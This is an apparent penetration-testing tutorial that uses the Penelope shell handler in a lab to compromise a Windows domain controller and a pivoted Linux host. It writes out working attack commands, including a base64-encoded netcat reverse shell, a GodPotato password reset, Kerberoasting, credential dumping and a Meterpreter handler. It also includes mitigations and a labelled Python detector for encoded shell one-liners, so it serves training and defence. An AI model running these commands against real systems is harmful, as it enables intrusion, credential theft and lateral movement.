Penelope – A Modern Alternative to Netcat for Red Teamers
2026-6-12 12:28:41 Author: www.hackingarticles.in

Overview

This article presents an end-to-end engagement built entirely around Penelope, an automated shell handler and post-exploitation framework. We catch an initial reverse shell on a Windows Server 2019 Domain Controller, drive Penelope’s modules to escalate privileges, dump credentials, harvest Active Directory data, and Kerberoast a service account, then hand off to Meterpreter and clean up our artefacts. From there, we pivot through the domain controller into a hidden subnet with Ligolo-ng, compromise a Linux host, and run a full sweep of Linux enumeration tooling. Finally, we explore Penelope’s operational backbone—custom listeners, tailored payload generation, bind-shell connections, multi-session management, port forwarding, file transfer, and a built-in HTTP file server. Together, these stages show how a single console can manage the complete post-exploitation lifecycle across both Windows and Linux.

Table of Contents: 

  • Introduction
  • Lab Environment
  • Installing Penelope
  • Starting the Listener
  • Generating the Reverse Shell Payload
  • Receiving the Reverse Shell
  • Detaching the Session
  • Listing the Available Modules
  • Exploring the Help Menu
  • Privilege Escalation Enumeration (Windows)
  • Staging the Potato Exploits
  • Credential Dumping
  • Active Directory Tooling
  • Spawning a Meterpreter Session
  • Cleaning Up Artefacts
  • Pivoting with Ligolo-ng
  • Establishing the Pivot Route
  • Scanning and Accessing the Hidden Host
  • Catching and upgrading the Linux Shell
  • Linux Privilege-Escalation Enumeration
  • Collecting Forensic Artefacts
  • Managing Multiple Sessions
  • Forwarding a Loopback-Only Service
  • Transferring Files to and From the Target
  • Adding a Custom Listener
  • Generating Payloads for the Listener
  • Executing the Payload on the Target
  • Catching the New Reverse Shell
  • Connecting to a Bind Shell
  • Spawning a Reverse Shell over SSH
  • Serving Files over HTTP
  • Mitigation Strategies
  • Conclusion

Introduction

Penelope is an automated, cross-platform shell handler designed to replace the bare “netcat” listener that most operators reach for by default. Beyond simply catching a reverse shell, it manages multiple concurrent sessions, logs every interaction to disk, upgrades raw shells to fully interactive PTYs, and exposes a rich library of post-exploitation modules. With a single command, an operator can stage privilege-escalation enumeration tools, credential-dumping utilities, Active Directory tradecraft, pivoting agents, and persistence mechanisms directly onto the target.

The framework also gives the operator precise control over how shells connect: it can add listeners on demand, generate matching payloads, connect to bind shells, forward ports through an existing session, and serve files over HTTP. Because Penelope automates the repetitive plumbing of an engagement—downloading the latest tooling, uploading it to the victim, executing it, and recording the output—it lets the operator concentrate on tradecraft rather than logistics. The walkthrough below follows that workflow from initial access through pivoting and operational control, entirely within a controlled lab and strictly for authorised testing and education.

Lab Environment

The engagement uses an isolated VMware lab containing a Kali attacker and several targets across the IGNITE (ignite.local) domain. Pivoting through the domain controller exposes an additional internal subnet that is not directly reachable from Kali.

Installing Penelope

We begin by installing Penelope directly from the Kali repositories. The package is lightweight—roughly 50 KB—and the APT resolver confirms a single new package will be installed from the kali-rolling main branch. Once installed, the “penelope” binary is available system-wide.

apt install penelope

Starting the Listener

Next, we launch Penelope and bind a listener to TCP port 5000. Penelope immediately reports that it is listening on 0.0.0.0:5000 and helpfully prints every interface address the operator might use as a callback—here including 192.168.1.17. The interactive prompt also surfaces shortcuts for the Main Menu, payload generation, screen clearing, and quitting.

penelope -p 5000

Generating the Reverse Shell Payload

With the listener live, we craft the payload that the target will execute. Using the Reverse Shell Generator, we set the attacker IP to 192.168.1.17 and the port to 5000, then select the Windows “PowerShell #2” template. The generator produces a self-contained PowerShell one-liner that opens a TCP client back to our listener and streams an interactive shell over the connection.

The following PowerShell payload is delivered to the target. (It is wrapped here for readability; in practice, it runs as a single line.)

powershell -nop -c "command"

Receiving the Reverse Shell

Once the payload runs on the victim, Penelope catches the connection instantly. It fingerprints the host and reports a new reverse shell from “DC” at 192.168.1.11, identifying it as a Microsoft Windows Server 2019 Standard Evaluation x64 machine. Penelope adds readline support, attaches us to Session 1, and writes a session log to disk for later review. A quick “whoami” confirms we are running as ignite\administrator—the built-in domain administrator on the DC.

whoami

Detaching the Session

Penelope lets us step back from an interactive shell without killing it. Pressing Ctrl-D detaches the current session and drops us back to the Penelope menu, where the prompt now shows the active Session [1]. The shell on the target remains live, ready for us to re-attach or to drive with modules from the menu.

[ Press Ctrl-D to detach the session ]

Listing the Available Modules

From the menu, the “modules” command reveals Penelope’s post-exploitation arsenal, neatly grouped by purpose: Privilege Escalation (winPEAS, LinPEAS, PowerUp, PrivescCheck, potato exploits, and more), Credential Dumping (Mimikatz, LaZagne, Snaffler, SharpWeb), Active Directory (PowerView, SharpHound, GhostPack), Forensics, Pivoting (Ligolo-ng, Chisel, ngrok), Persistence (PANIX), and miscellaneous helpers such as a Meterpreter launcher and a cleanup routine. Each module automates downloading the latest release and staging it on the target.

modules

Exploring the Help Menu

The “help” command documents Penelope’s full command set. Session operations include run, upload, download, open, spawn, upgrade, exec, script, and portfwd; session management covers sessions, use, interact, and kill; and shell management exposes listeners, payloads, and connect. This single reference makes the framework approachable even mid-engagement.

help

Privilege Escalation Enumeration (Windows)

We start post-exploitation by staging privilege-escalation tooling. The “run upload_privesc_scripts” module downloads the latest winPEASany.exe, winPEAS.bat, PowerUp.ps1, and PrivescCheck.ps1 and uploads each one to the target’s administrator profile, confirming an “Upload OK” for every file.

run upload_privesc_scripts

With the tools in place, we execute winPEAS to enumerate the host. winPEAS scans for misconfigurations, privileged objects, and sensitive data, colour-coding its findings—red for potential privilege-escalation vectors, green for hardened settings, and cyan or blue for active and disabled users—to highlight the fastest path to elevation.

exec C:\Users\Administrator\winPEASany.exe

Staging the Potato Exploits

Service accounts that hold the SeImpersonatePrivilege are prime targets for the “potato” family of exploits. The “run upload_potato” module uploads GodPotato-NET4.exe, SigmaPotato.exe, and PrintSpoofer64.exe to the target, each abusing token impersonation to elevate to NT AUTHORITY\SYSTEM.

run upload_potato

We re-attach to Session 1 and run GodPotato to execute a command as SYSTEM. By impersonating a SYSTEM token captured through the RPCSS DCOM trigger, GodPotato resets the administrator account password to a value of our choosing. The output confirms the impersonation succeeded as NT AUTHORITY\SYSTEM and that the command completed successfully.

sessions 1
./GodPotato-NET4.exe -cmd "net user administrator Ignite@987"

Credential Dumping

Next, we harvest credentials. The “run upload_credump_scripts” module stages Mimikatz, LaZagne, Snaffler, and SharpWeb on the target. Together these tools extract cached secrets, browser and application passwords, and credentials scattered across file shares.

run upload_credump_scripts

Executing LaZagne dumps secrets across every supported software module. Running as SYSTEM, it decrypts the system master keys and reveals the LSA secrets—including the machine account hash, the DefaultPassword used for autologon, the DPAPI_SYSTEM key, and the NL$KM cached-credential key—providing rich material for lateral movement.

exec C:\Users\Administrator\LaZagne.exe

Active Directory Tooling

To map and attack the domain, we stage Active Directory tradecraft. The “run upload_ad_scripts” module uploads PowerView.ps1 for domain reconnaissance, SharpHound for BloodHound collection, and the full GhostPack suite of compiled C# offensive tools.

run upload_ad_scripts

Listing the GhostPack directory reveals the complete toolset—Rubeus, Certify, Seatbelt, SharpRoast, and more, compiled for several .NET versions. We then run Rubeus to Kerberoast the domain, which identifies a single kerberoastable account, “raj,” bearing the service principal name hackingarticles/ignite.local, and writes its crackable ticket hash to hash.txt for offline cracking.

exec dir C:\Users\Administrator\ghostpack
exec C:\Users\Administrator\ghostpack\Rubeus.exe kerberoast /outfile:hash.txt

Spawning a Meterpreter Session

Penelope integrates cleanly with the Metasploit Framework. The “run meterpreter” module generates an x64 Windows Meterpreter reverse-TCP payload with msfvenom, uploads it to the target’s temp directory, and prints the exact msfconsole handler command—pre-configured with our LHOST of 192.168.1.17 and LPORT 5555—before executing the payload on the victim.

run meterpreter

Once we launch the handler in msfconsole and trigger the uploaded executable, Metasploit reports a Meterpreter session opened from 192.168.1.11. A “sysinfo” confirms full control of the domain controller: computer DC, Windows Server 2019 (Build 17763), x64 architecture, joined to the IGNITE domain.

msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.1.17; set LPORT 5555; run"

sysinfo

Cleaning Up Artefacts

Good operational security means removing the tools we staged. The “run cleanup” module deletes every file Penelope uploaded during the engagement—Mimikatz, LaZagne, Snaffler, SharpWeb, PowerView, SharpHound, GhostPack, and the Kerberoast output—restoring the target to its prior state and reducing forensic footprint.

run cleanup

Pivoting with Ligolo-ng

With the domain controller fully under control, we prepare to pivot deeper. On the attacker, we start the Ligolo-ng proxy with a self-signed certificate; it loads its configuration and listens on 0.0.0.0:11601 for incoming agents.

ligolo-proxy --selfcert

Back in Penelope, the “run ligolo” module downloads and uploads the matching Ligolo-ng Windows agent to the target. We then execute the agent, instructing it to connect back to our proxy at 192.168.1.17:11601 while ignoring certificate validation. With the tunnel established, the operator can route traffic through the domain controller and reach otherwise unreachable internal segments.

run ligolo
exec C:\Users\Administrator\agent.exe -connect 192.168.1.17:11601 -ignore-cert

Establishing the Pivot Route

With the agent reporting “Agent joined,” we select the domain controller session and inspect its interfaces. The “ifconfig” output reveals that the DC is dual-homed: alongside its primary 192.168.1.11 address, Interface 1 carries a second address, 192.168.147.130/24, exposing an internal subnet that Kali cannot reach directly. We then run “autoroute,” select that 192.168.147.130/24 network, let Ligolo create a fresh virtual interface, and start the tunnel. From this point on, traffic to the 192.168.147.0/24 range routes transparently through the compromised DC.

session
ifconfig
autoroute

Scanning and Accessing the Hidden Host

With the route live, we scan the newly reachable host through the tunnel. An Nmap service scan of 192.168.147.131 uncovers a Linux server running FTP (vsftpd 3.0.5), SSH (OpenSSH 8.9p1), Apache 2.4.52, rpcbind, Samba, and NFS. Armed with valid credentials, we open an SSH session as the “pentest” user and land on an Ubuntu 22.04.5 LTS host named ignite—a machine that simply did not exist from Kali’s perspective minutes earlier.

nmap -sV 192.168.147.131
ssh pentest@192.168.147.131

Catching and upgrading the Linux Shell

Next, we route a reverse shell from the Linux host back into Penelope. The listener on port 5000 catches the connection, fingerprints it as ignite (192.168.1.9, Linux-x86_64) running as pentest, and—crucially—automatically upgrades the raw shell to a fully interactive PTY using python3. A quick “lsb_release -a” confirms Ubuntu 22.04.5 LTS (jammy). We then detach, leaving the session live for module-driven enumeration.

[ Press F12 to detach the session ]

penelope -p 5000
lsb_release -a

Linux Privilege-Escalation Enumeration

We begin Linux enumeration with PEASS-ng. The “run peass_ng” module downloads the latest linpeas.sh, executes it on the target in the background, and streams the live output into a dedicated terminal. LinPEAS systematically hunts for privilege-escalation vectors and colour-codes its findings, flagging anything marked RED/YELLOW as a 95% likely escalation path.

run peass_ng

To corroborate those results, we run Linux Smart Enumeration. The “run lse” module fetches lse.sh and executes it, producing a tidy report of the user context, host details, and a tiered set of security checks that escalate in verbosity.

run lse

Finally, we focus specifically on kernel and package weaknesses. The “run linuxexploitsuggester” module downloads linux-exploit-suggester and matches the kernel against known CVEs, surfacing candidates such as CVE-2021-3156 (the Sudo “Baron Samedit” heap overflow) and CVE-2021-22555 (a Netfilter heap out-of-bounds write), complete with exposure ratings and exploit links.

run linuxexploitsuggester

Collecting Forensic Artefacts

Penelope also supports defensive and forensic workflows. The “run uac” module uploads the Unix-like Artifacts Collector (UAC) to /dev/shm, extracts it, and launches a structured collection of nearly 200 artefact definitions—process listings, open files, and live-response data—writing the results to a timestamped archive on the target for later analysis.

run uac

Managing Multiple Sessions

With several footholds in play, Penelope’s session management comes into its own. The “history” command replays every Main Menu command issued during the engagement—an invaluable audit trail when documenting an assessment or retracing a complex attack path.

history

Sessions

The “sessions” command lists every active shell at a glance. Here, Penelope holds two: Session 1 on the Linux host (ignite, 192.168.1.9, a PTY shell as pentest) and Session 2 on the Windows DC (192.168.1.11, a raw shell as ignite\administrator).

sessions

Interact

To switch context, we attach directly to a specific shell. The “interact 2” command drops us into the Windows DC session, returning the familiar PowerShell prompt.

interact 2

Kill

Sessions can also be torn down cleanly. The “kill 2” command terminates the DC shell—Penelope reports that the session died—and a follow-up “sessions” confirms only the Linux host remains.

kill 2
sessions

Use Command

The “use 1” command selects the Linux session as the active target without immediately attaching to its shell, so that subsequent menu commands and modules apply to it.

use 1

Spawn

When a single shell is not enough, Penelope can spawn more. The “spawn 1234” command opens a new listener on 192.168.1.17:1234 and triggers an additional reverse shell from the same Linux host, which arrives as Session 3. Listing sessions now shows both shells—the original PTY on port 5000 and the new raw shell on port 1234—giving us redundancy if one connection drops.

spawn 1234
sessions

Local Port Forwarding

Many services bind only to localhost, hiding from the network. Running “exec netstat -antp” on the target reveals exactly such a service listening on 127.0.0.1:8080, reachable only from the host itself.

exec netstat -antp

Because that service is bound to loopback, browsing to the target’s port 8080 across the network fails—Firefox simply reports “Unable to connect.” The service is effectively invisible to a remote attacker.

http://192.168.1.11:8080

Penelope solves this with built-in port forwarding. The “portfwd” command tunnels our local 127.0.0.1:8080 to the target’s 127.0.0.1:8080 through the existing session, bridging the loopback gap without any extra tooling on the victim.

portfwd 127.0.0.1:8080 -> 127.0.0.1:8080

With the forward in place, we browse to http://localhost:8080 on the attacker and the hidden web application loads cleanly, greeting us with “Welcome to Hacking Articles.” A service that was unreachable moments ago is now fully accessible.

http://localhost:8080

Transferring Files to and From the Target

Penelope makes file transfer effortless. The “upload” command pushes a local file to the target; here we upload raj.txt and confirm its arrival with “exec ls -al,” which shows the file in place under /home/pentest with the expected ownership and timestamp.

upload raj.txt
exec ls -al /home/pentest/raj.txt

Pulling files back is just as simple. After listing the target’s home directory with “exec ls,” we run “download” on ignite.txt; Penelope retrieves it and stores it neatly inside the per-session downloads folder on the attacker.

exec ls /home/pentest/
download /home/pentest/ignite.txt

Finally, we verify the exfiltrated file on Kali. Reading the downloaded ignite.txt from the session’s downloads directory returns its contents—“Visit Hacking Articles”—confirming a clean round-trip transfer.

cat /root/.penelope/sessions/ignite~192.168.1.11-Linux-x86_64/downloads/home/pentest/ignite.txt

Adding a Custom Listener

Beyond catching shells, Penelope gives the operator precise control over how and where connections arrive. We start by creating a listener on a specific interface and port. The “listeners add” command binds a new TCP listener to 192.168.1.17 on port 8888, and Penelope immediately confirms it is listening. Running “listeners” then lists every active listener, showing the new entry as ID 3—ready to receive callbacks.

listeners add -i 192.168.1.17 -p 8888
listeners

Generating Payloads for the Listener

Penelope can craft matching payloads for any active listener. The “payloads eth0” command generates a set of one-liners bound to the eth0 listener at 192.168.1.17:8888, offering several flavours—Bash TCP, Netcat with a named pipe, PowerShell, and a Metasploit handler configuration. Each payload is pre-populated with the correct host and port, so there is nothing left to edit before use.

payloads eth0

Executing the Payload on the Target

Next, we run one of the generated payloads on the Linux target. The Netcat-with-named-pipe one-liner is base64-encoded; decoding and piping it to the shell creates a FIFO, wires the shell’s input and output through it, and connects back to our 8888 listener. The command returns silently, indicating the reverse shell has fired.

printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1wL198c2ggMj4mMXxuYyAxOTIuMTY4LjEuMTcgODg4OCA+L3RtcC9fKSA+L2Rldi9udWxsIDI+JjEgJg==|base64 -d|sh

Catching the New Reverse Shell

Back in Penelope, the payload pays off. The console announces a new reverse shell from ignite (192.168.1.11) running as pentest, assigned Session ID 3. A “sessions” listing confirms the shell arrived on the dedicated 192.168.1.17:8888 listener—clearly distinguished from the earlier session on port 5000—demonstrating how separate listeners keep concurrent operations organised.

sessions

Connecting to a Bind Shell

Penelope is not limited to reverse shells. When a target already listens with a bind shell, the “connect” command reaches out to it directly. Here we connect to a bind shell on a Windows DC at 192.168.1.12 port 4321; Penelope establishes the connection, fingerprints the host as Windows Server 2019, adds readline support, and drops us straight into an interactive session as Session 4.

connect 192.168.1.12 4321

Spawning a Reverse Shell over SSH

Penelope can also launch a listener and trigger a shell in a single command. By appending an SSH directive to the launch line, we start a listener on port 5555 and have Penelope execute a reverse-shell command over SSH against 192.168.1.11 in one step. Penelope reports the SSH command executed, catches the resulting shell, and—as before—automatically upgrades it to a fully interactive PTY via python3. A quick “whoami” confirms we are the pentest user.

penelope -p 5555 ssh pentest@192.168.1.11
whoami

Serving Files over HTTP

Staging tools and exfiltrating loot often calls for a quick web server. Penelope bundles one: the “-s” flag serves a local directory over HTTP. Launching it on the “share” folder publishes /root/share on port 8000 and conveniently prints the full URL for every available interface, including 192.168.1.17, so the target can fetch files immediately.

penelope -s share

Browsing to the published URL confirms the server is live. Navigating to http://192.168.1.17:8000/share/ renders a directory listing of the shared folder, exposing data.txt and secret.txt for download—an instant, dependency-free way to move files between attacker and target.

http://192.168.1.17:8000/share/

Mitigation Strategies

Defenders can disrupt every stage of this engagement with a layered set of controls:

  • Segment networks and avoid dual-homing sensitive servers such as domain controllers, so a single compromise cannot bridge isolated subnets or enable pivoting.
  • Enforce strict egress filtering and application-aware firewalls so internal hosts cannot open outbound connections to attacker-controlled listeners on arbitrary ports, and monitor for unexpected tunnels or virtual interfaces created by tools like Ligolo-ng, Chisel, or ngrok.
  • Constrain PowerShell with Constrained Language Mode, script-block and module logging, and AMSI, and alert on encoded or download-cradle one-liners.
  • Remove SeImpersonatePrivilege from accounts that do not require it to neutralise the potato family of token-impersonation exploits.
  • Protect credentials by enabling Credential Guard and LSA protection (RunAsPPL), disabling WDigest, and clearing autologon DefaultPassword values.
  • Harden service accounts against Kerberoasting by using Group Managed Service Accounts with long, random passwords and enforcing AES encryption types.
  • Apply timely kernel and package updates to close local privilege-escalation flaws such as CVE-2021-3156 and CVE-2021-22555, and restrict SUID binaries and unnecessary Sudo rules that LinPEAS and LSE routinely flag.
  • Restrict and log SSH with key-based authentication, MFA, source-IP allow-listing, and command auditing to catch remotely injected reverse-shell commands.
  • Detect bind shells and ad-hoc file servers by baselining the legitimate services each host should expose and alerting on unexpected listening ports or HTTP transfers.
  • Watch for shell tradecraft—base64-decoded one-liners, named-pipe (mkfifo) reverse shells, and unexpected use of nc, bash, or powershell to open sockets—and monitor for bulk file reads or writes that signal staging or exfiltration.
  • Deploy EDR and network detection to correlate listener creation, payload execution, credential access, and new sessions as a single intrusion rather than isolated events.
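The final bullets above, and the base64-wrapped named-pipe one-liner executed earlier in the walkthrough, describe the kind of shell tradecraft a defender should catch in recorded command lines. The following Python is an added example, not code from the original article or from the Penelope project: it decodes any base64 that a command line hands to a shell and scores the plaintext for reverse-shell indicators. The command lines and the indicator names are constructed for illustration; the first command line is the article's own payload.

```python
"""Flag base64-wrapped shell one-liners in recorded command lines.

Added example (not part of the original article or of Penelope).
The input is a list of constructed command-line strings, as an auditd
or EDR pipeline might record them.
"""
import base64
import binascii
import re

# Constructed samples. The first is the named-pipe one-liner from the
# article; the other three are benign uses of base64 that must stay quiet.
SAMPLE_CMDLINES = [
    "printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1wL198c2ggMj4mMXxuYyAx"
    "OTIuMTY4LjEuMTcgODg4OCA+L3RtcC9fKSA+L2Rldi9udWxsIDI+JjEgJg==|base64 -d|sh",
    "echo aGVsbG8gd29ybGQK | base64 -d",
    "base64 -d /tmp/cert.b64 > /tmp/cert.pem",
    "echo ZWNobyBoZWxsbw== | base64 -d | sh",  # decodes to a harmless 'echo hello'
]

# A base64-looking token (letters, digits, '+', '/', optional '=' padding).
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
# "base64 -d" (or --decode) whose output is piped into a shell later on the line.
_DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba|z|da)?sh\b")

# Plaintext indicators of a reverse shell, keyed by an assumed indicator name.
_INDICATORS = {
    "named_pipe": re.compile(r"\bmkfifo\b"),
    "netcat_connect": re.compile(r"\b(?:nc|ncat|netcat)\s+\S+\s+\d{1,5}\b"),
    "dev_tcp": re.compile(r"/dev/tcp/"),
    "interactive_shell": re.compile(r"\b(?:ba)?sh\s+-i\b"),
    "backgrounded": re.compile(r"&\s*$"),
}


def decode_b64_tokens(cmdline):
    """Return the plaintext of every token that is valid base64 and decodes to UTF-8."""
    decoded = []
    for token in _B64_TOKEN.findall(cmdline):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or binary data: not a shell one-liner
    return decoded


def analyse_cmdline(cmdline):
    """Return a finding dict for one command line, or None if nothing is suspicious.

    A finding requires both the decode-to-shell plumbing and at least one
    reverse-shell indicator in the decoded text, so benign base64 decoding
    and benign scripts piped to sh are not reported.
    """
    if not _DECODE_TO_SHELL.search(cmdline):
        return None
    for plaintext in decode_b64_tokens(cmdline):
        hits = [name for name, rx in _INDICATORS.items() if rx.search(plaintext)]
        if hits:
            return {"cmdline": cmdline, "decoded": plaintext, "indicators": hits}
    return None


def scan(cmdlines):
    """Run analyse_cmdline over a batch and keep only the findings."""
    return [f for f in (analyse_cmdline(c) for c in cmdlines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print("ALERT:", finding["indicators"])
        print("  decoded:", finding["decoded"])
```

The same pattern extends to other decode-and-execute chains by adding alternatives to `_DECODE_TO_SHELL`, while the indicator table carries the page's own markers (mkfifo, nc with host and port, a backgrounded job).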

Conclusion

This engagement showed Penelope operating as a complete post-exploitation hub rather than a simple shell catcher. Starting from a single reverse shell on a Windows domain controller, we used its modules to escalate to SYSTEM, dump credentials, harvest Active Directory data, Kerberoast a service account, hand off to Meterpreter, and clean up afterwards. We then rode a Ligolo-ng pivot into a hidden subnet, compromised a Linux host, and ran a full enumeration sweep with PEASS-ng, LSE, Linux Exploit Suggester, and UAC. Finally, we exercised the framework’s operational backbone—custom listeners, tailored payloads, bind-shell connections, multi-session management, port forwarding, file transfer, and a built-in HTTP server. Across Windows and Linux alike, Penelope unified the entire workflow into one coherent, auditable console. For defenders, the same walkthrough is a clear map of the behaviours to monitor and the controls that break the chain. Used only where you have explicit authorisation, Penelope is a powerful force multiplier for the modern operator.


Article source: https://www.hackingarticles.in/penelope-a-modern-alternative-to-netcat-for-red-teamers/